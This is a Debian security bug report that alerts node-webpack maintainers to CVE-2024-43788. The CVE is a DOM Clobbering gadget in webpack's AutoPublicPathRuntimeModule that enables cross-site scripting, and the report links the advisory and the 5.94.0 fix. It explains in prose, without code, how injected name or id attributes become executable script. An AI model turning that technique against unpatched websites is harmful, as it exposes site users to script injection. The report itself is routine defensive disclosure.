Source: node-webpack X-Debbugs-CC: t...@security.debian.org Severity: important Tags: security
Hi, The following vulnerability was published for node-webpack. CVE-2024-43788[0]: | Webpack is a module bundler. Its main purpose is to bundle | JavaScript files for usage in a browser, yet it is also capable of | transforming, bundling, or packaging just about any resource or | asset. The webpack developers have discovered a DOM Clobbering | vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM | Clobbering gadget in the module can lead to cross-site scripting | (XSS) in web pages where scriptless attacker-controlled HTML | elements (e.g., an `img` tag with an unsanitized `name` attribute) | are present. Real-world exploitation of this gadget has been | observed in the Canvas LMS which allows a XSS attack to happen | through a javascript code compiled by Webpack (the vulnerable part | is from Webpack). DOM Clobbering is a type of code-reuse attack | where the attacker first embeds a piece of non-script, seemingly | benign HTML markups in the webpage (e.g. through a post or comment) | and leverages the gadgets (pieces of js code) living in the existing | javascript code to transform it into executable code. This | vulnerability can lead to cross-site scripting (XSS) on websites | that include Webpack-generated files and allow users to inject | certain scriptless HTML tags with improperly sanitized name or id | attributes. This issue has been addressed in release version 5.94.0. | All users are advised to upgrade. There are no known workarounds for | this issue. https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 (v5.94.0) If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2024-43788 https://www.cve.org/CVERecord?id=CVE-2024-43788 Please adjust the affected versions in the BTS as needed. -- Pkg-javascript-devel mailing list Pkg-javascript-devel@alioth-lists.debian.net https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/pkg-javascript-devel